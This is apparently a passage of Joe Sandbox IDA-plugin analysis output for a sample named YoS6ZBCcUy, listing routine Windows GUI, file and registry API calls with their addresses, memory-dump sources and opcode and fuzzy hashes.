                                                                                                                                                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DA4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                              • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403382,004DF000,004DF000,004DF000,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                              • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                              • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00428200,?,00428200,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                              • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                              • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Remove folder: ,?), ref: 0040614B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                              • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040424B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemText
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                                                                              • Opcode ID: fbaad98f197721c3337b4145f660dfcccd1462cc21775b0cc75c291dee439915
                                                                                                                                                                                              • Instruction ID: 58c8b0ee816a9f079cb4560b894257bfb9dfa06490f5d5235509ae25e2c95a64
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbaad98f197721c3337b4145f660dfcccd1462cc21775b0cc75c291dee439915
                                                                                                                                                                                              • Instruction Fuzzy Hash: 79C04C76148300BFD681BB55CC42F1FB79DEF94315F44C52EB59CA11E2C63A84309B26
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                              • Opcode ID: df53f0ac968c80b2573d185eedc41732bb4466fa0b660203ffcc6a72f8356a2c
                                                                                                                                                                                              • Instruction ID: 539d97cecbd0a6245bb22c05259f77f590d4a0b0d5c0f28d123e3a53dcb21da8
                                                                                                                                                                                              • Opcode Fuzzy Hash: df53f0ac968c80b2573d185eedc41732bb4466fa0b660203ffcc6a72f8356a2c
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6C09BB27403007BDE11CB909E49F1777545790740F18447DB348F51E0D6B4D490D61C
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                              • Opcode ID: 916ba585e608d634958797641490031ceb4b368d387894d1e0aab50b7c43ae9e
                                                                                                                                                                                              • Instruction ID: 80b1fa8ab317a3fb83bf0bb9afc1fcb2ede285a6b5c9b7890d3d6fe7da01b763
                                                                                                                                                                                              • Opcode Fuzzy Hash: 916ba585e608d634958797641490031ceb4b368d387894d1e0aab50b7c43ae9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69B092361C4600AAEE118B50DE49F497A62E7A4702F008138B244640B0CAB200E0DB09
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                              • Opcode ID: ea082ecd867c03a11dfd78164402b3a9c9d6e2ba96aa803d9d5c73deeff3904d
                                                                                                                                                                                              • Instruction ID: 6a6b83ba7992c3eb947fe44f0607646ae594aefa1fc7371f7d6a783f6fb0b7b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea082ecd867c03a11dfd78164402b3a9c9d6e2ba96aa803d9d5c73deeff3904d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EA002754445019BCF015B50DF098057A61F7A4701B114479B5555103596314860EB19
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00403703,00000006,?,00000006,00000008,0000000A), ref: 004038DB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                              • Opcode ID: 6cd6e50f5f17456ee504dea1d279a22ffa05636b30f87aa31bf8984a95f31d7c
                                                                                                                                                                                              • Instruction ID: f79f1cdd038f729e9031bf35a7c7ad7adb8aafebcc14ea038f42f7e62efb972e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cd6e50f5f17456ee504dea1d279a22ffa05636b30f87aa31bf8984a95f31d7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69C0127054070496C1206F759D4F6193E54AB8173BB604776B0B8B10F1C77C4B59595E
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                                                              • Opcode ID: 21818fa51d6b588aeca07265a4b81a3a3b935111f3ce34767c97606af49217ff
                                                                                                                                                                                              • Instruction ID: 350e9793ba1948ff1935c4af006ad7833f39553502bf8ecbcf91bc97059cc7bb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21818fa51d6b588aeca07265a4b81a3a3b935111f3ce34767c97606af49217ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C0281B0900209AFDB10DFA4DD85AAE7BB5FB44314F10417AF614BA2E1C7799D92CF58
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Remove folder: ,00450248,00000000,?,?), ref: 00404889
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404895
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00002000,004048DE), ref: 00405917
                                                                                                                                                                                                • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                • Part of subcall function 0040654E: CharPrevW.USER32(?,?,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00440218,?,?,0000040F,?,00440218,00440218,?,00000001,00440218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                • Part of subcall function 00404ADE: lstrlenW.KERNEL32(00450248,00450248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,00450248), ref: 00404B9B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                              • String ID: A$Remove folder:
                                                                                                                                                                                              • API String ID: 2624150263-1936035403
                                                                                                                                                                                              • Opcode ID: d9ff5aa2ff53ffbe0c3723e23dc604a8a31f393e15f5d8e1a009d79f52351d08
                                                                                                                                                                                              • Instruction ID: aec38ac33e169681c2ce75898e964705c21f391e9d8eef84a8e49708370a7c65
                                                                                                                                                                                              • Opcode Fuzzy Hash: d9ff5aa2ff53ffbe0c3723e23dc604a8a31f393e15f5d8e1a009d79f52351d08
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CA173B1900208ABDB11AFA5CD45AAF77B8EF84314F10847BF605B62D1D77C99418F6D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                              • Opcode ID: 6add73535d334bbd10faeab47eb29d8a703edf5c42766cfe57afeb0baa1f3480
                                                                                                                                                                                              • Instruction ID: 6590b0d0bd135a94e5278e34c2007f8374f9804fe0c2ec815525577e7f77d17f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6add73535d334bbd10faeab47eb29d8a703edf5c42766cfe57afeb0baa1f3480
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                              • Opcode ID: 54b460b755f9bf27e46ac1d39a8a1124328dc74cebdc85c095498b08f8838b6a
                                                                                                                                                                                              • Instruction ID: 11d43fc069a5ea90b0fea77c2c23c6da8a8dfc92bb9fdb714ff4c9b8b345b962
                                                                                                                                                                                              • Opcode Fuzzy Hash: 54b460b755f9bf27e46ac1d39a8a1124328dc74cebdc85c095498b08f8838b6a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D909B2A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                              • String ID: N$Remove folder: $gC@
                                                                                                                                                                                              • API String ID: 3103080414-3559505530
                                                                                                                                                                                              • Opcode ID: 96cce4fce431ccadf5917f17b99feddee1f1d895ae547b1ae29d71d99e1dfbb5
                                                                                                                                                                                              • Instruction ID: 3402c350d7270d9961c63d8365249516a5ebc70a9ec23ab72cb453283ebd69b0
